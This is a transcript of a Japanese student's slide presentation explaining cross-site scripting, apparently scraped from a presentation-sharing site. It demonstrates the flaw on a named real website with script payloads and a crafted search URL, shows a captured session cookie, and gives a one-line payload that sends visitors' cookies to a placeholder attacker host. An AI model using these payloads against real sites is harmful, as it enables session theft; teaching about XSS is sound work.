1 / 15

Vulnerability of Cross-Site Scripting

Vulnerability of Cross-Site Scripting. XSS 脆弱性の検証. 環境情報学部 2 年 中村拓央. What is C ross-Site Scripting?. 悪意を持った攻撃者が WEB 上の入力フォームなどを通してスクリプトコードを挿入し、そのスクリプトがそのまま HTML に埋め込まれ、ページを閲覧したユーザのブラウザ上でスクリプトが実行されてしまうこと。                 ↓ 他人のサイトで勝手に           スクリプトを実行するということ。.

Download Presentation

Vulnerability of Cross-Site Scripting

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Vulnerability of Cross-Site Scripting XSS脆弱性の検証 環境情報学部2年 中村拓央

  2. What is Cross-Site Scripting? 悪意を持った攻撃者がWEB上の入力フォームなどを通してスクリプトコードを挿入し、そのスクリプトがそのままHTMLに埋め込まれ、ページを閲覧したユーザのブラウザ上でスクリプトが実行されてしまうこと。                 ↓ 他人のサイトで勝手に           スクリプトを実行するということ。

  3. What is Cross-Site Scripting? ~悪意のあるスクリプトによって起こりうる被害~ ・cookieの漏洩 ・ページの改竄 ・データの破壊   最悪の事態は重要な個人情報や利権を操作するためのcookieを盗まれてしまうこと。

  4. What is Cross-Site Scripting? 最近ではWEB製作者はそうしたスクリプトコードを実行させないような処理をしている。 数年前と比較するとそのようなXSS脆弱性を持ったサイトは少なくなってきている。    もう存在しないのかな?

  5. そんなサイトを発見

  6. <script>alert(“XSS脆弱性”)</script>

  7. 実行されてしまったので、 XSS脆弱性をもっているということになる。

  8. 具体的なXSS実行方法 <script> alert(document.cookie) ; </script> というスクリプトを先ほどのサイトに埋め込んでみる。

  9. <script>alert(document.cookie) ;</script>

  10. ASPSESSIONIDQCBBQRBT=EAHELLGBLPHMHFGANCIOMDHA

  11. 具体的なXSS実行方法 攻撃者は以下のようなリンクを自分の用意したページに含ませたり、大勢の人が観覧する掲示板あるいはメールに貼り付けたりしてユーザを誘導する。 http://www4.access-t.co.jp/navi/acs03/search/search_result.asp? free_word=%3Cscript%3Ealert%28document.cookie%29+%3B%3C%2Fscript%3E&condition=00&kensaku01222=%8C%9F%8D%F5&mode=freeword&new=dummy&page=top 赤文字の部分はデコードすると、<script>alert(document.cookie) ;</script>

  12. http://www4.access-t.co.jp/navi/acs03/search/search_result. asp?free_word=<script>alert(document.cookie) ;</script> &condition=00&kensaku01222=%8C%9F%8D%F5&mode=freeword&new=dummy&page=top

  13. 具体的なXSS実行方法 document.location=“http://○○○○/cookie.cgi?cookie="+document.cookie; このようなスクリプトを含ませることで、攻撃者サイトのcookie.cgiにユーザーのcookieを含んだ形でアクセスさせることも可能。

  14. 結論 ・WEBアプリケーション、CGIプログラマーはXSSを軽視しないこと!

More Related